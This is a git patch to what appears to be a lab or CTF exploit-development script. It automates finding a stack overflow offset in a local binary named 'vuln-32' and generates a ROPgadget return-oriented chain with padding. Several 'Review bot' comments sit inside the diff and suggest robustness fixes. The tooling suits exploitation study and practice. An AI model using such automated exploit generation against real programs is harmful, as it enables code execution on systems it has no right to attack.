From 688bb5a1be088385b75179c7edf48968187ee354 Mon Sep 17 00:00:00 2001
From: Liam Dalgarno
Date: Wed, 25 Nov 2020 15:38:08 +0000
Subject: [PATCH] Run ROPGadget with auto offset
Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com>
Co-authored-by: jack bond-preston
---
 init.sh | 1 +
 offset.py | 43 ++++++++++++++++++++++++++++++-------------
 2 files changed, 31 insertions(+), 13 deletions(-)
diff --git a/init.sh b/init.sh
index 793e8c0..66066a7 100644
--- a/init.sh
+++ b/init.sh
@@ -9,6 +9,7 @@ sudo apt-get --quiet --assume-yes install gcc-multilib
 sudo apt-get --quiet --assume-yes install zsh
 sudo apt-get --assume-yes --quiet install python3 python3-pip python3-dev git libssl-dev libffi-dev
+sudo apt-get --assume-yes --quiet install python
 python3 -m pip install --upgrade pip
 python3 -m pip install --upgrade pwntools
diff --git a/offset.py b/offset.py
index 75e8781..f727cfb 100644
--- a/offset.py
+++ b/offset.py
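Review bot: The package name `python` on the added `apt-get` line is release-dependent — on Ubuntu 18.04 it pulls Python 2.7, while on 20.04 and later there is no package of that name and the line fails, with `--quiet --assume-yes` leaving little trace of why. The neighbouring lines and the offset.py change suggest the intent is a Python 2 interpreter for the ROPgadget-generated chain script, presumably; if so, name that dependency and its reason explicitly, e.g. `# Python 2 is needed only to run the ROPgadget --ropchain script written by offset.py` above the install line, and use the release-specific package name (`python2` on 20.04) or an `apt-cache` lookup. If init.sh does not run under `set -e` (its header is outside the hunk), a failure here is skipped silently and the rest of the setup proceeds without the interpreter.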
@@ -2,26 +2,43 @@ from pwnlib.elf.corefile import Coredump
 from pwnlib.util.cyclic import cyclic, cyclic_find
 from pwnlib.util.packing import pack
 from pwnlib.tubes.process import process
+
 import os
+import subprocess
-# TODO: command line arguments
-input_file = "input.txt"
 exec_name = "./vuln-32"
-core_file = "./core"
-os.remove(core_file)
+def find_offset(exec_name):
+ # TODO: command line arguments
+ input_file = "input.txt"
+ core_file = "./core"
-# TODO Loop until a crash, increase payload size each iteration
-with open(input_file, "wb") as f:
- payload = cyclic(512)
- f.write(payload)
+ os.remove(core_file)
-process([exec_name, input_file]).wait()
+ # TODO Loop until a crash, increase payload size each iteration
+ with open(input_file, "wb") as f:
+ payload = cyclic(512)
+ f.write(payload)
-core = Coredump('./core')
+ process([exec_name, input_file]).wait()
-assert pack(core.eip) in payload
+ core = Coredump('./core')
-print(cyclic_find(core.eip))
+ assert pack(core.eip) in payload
-os.remove(input_file)
+ os.remove(input_file)
+
+ return cyclic_find(core.eip)
+
+offset = find_offset(exec_name)
+
+# print("\t# Padding goes here") <-- search for this
+# print("\tp = ''\n")
+
+result = subprocess.run(["ROPgadget", "--binary", exec_name, "--ropchain"], stdout=subprocess.PIPE)
+stdout = result.stdout
+
+
+stdout = stdout.replace(b"p = ''\n", b"p = \"" + bytes('a' * offset, 'ascii') + b"\"\n")
+with open("test.py", "wb") as f:
+ f.write(stdout)
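Review bot: The ROPgadget result is never validated: `subprocess.run([...], stdout=subprocess.PIPE)` is called without `check=True`, so a non-zero exit (no chain found, wrong binary path) still produces a `stdout` that is written to `test.py`, and the later `stdout.replace(b"p = ''\n", ...)` silently leaves the padding out whenever that marker line is absent — exactly the case when ROPgadget fails or a different version emits another chain template. Add `check=True` to the `subprocess.run(...)` call and guard the substitution with `if b"p = ''\n" not in stdout: raise SystemExit("ROPgadget output has no \"p = ''\" line; cannot insert padding")`, plus a one-line comment at the replace call noting that the marker is tied to ROPgadget's `--ropchain` template. Separately, `find_offset` calls `os.remove(core_file)` unconditionally, so a first run with no stale core dies with `FileNotFoundError` — wrap it in `contextlib.suppress(FileNotFoundError)` — and `Coredump('./core')` should take `core_file` rather than repeating the path. The `assert pack(core.eip) in payload` check is stripped under `python -O`; since it is what stops a wrong offset from reaching the generated chain, an explicit `if ...: raise` is safer.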